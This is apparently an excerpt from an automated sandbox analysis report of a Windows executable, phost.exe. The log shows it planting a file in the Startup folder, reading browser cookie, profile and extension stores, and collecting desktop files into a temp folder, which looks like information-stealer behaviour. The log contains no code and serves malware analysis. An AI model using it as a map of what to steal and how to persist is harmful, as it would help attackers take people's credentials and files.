              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \System\Antivirus.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\HTAGVDFUIE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\HTAGVDFUIE.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\KATAXZVCPS.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\KZWFNRXYKI.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\KZWFNRXYKI.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\KZWFNRXYKI.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LTKMYBSEYZ.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LTKMYBSEYZ.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\NIKHQAIQAU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.pdf VolumeInformationJump to behavior
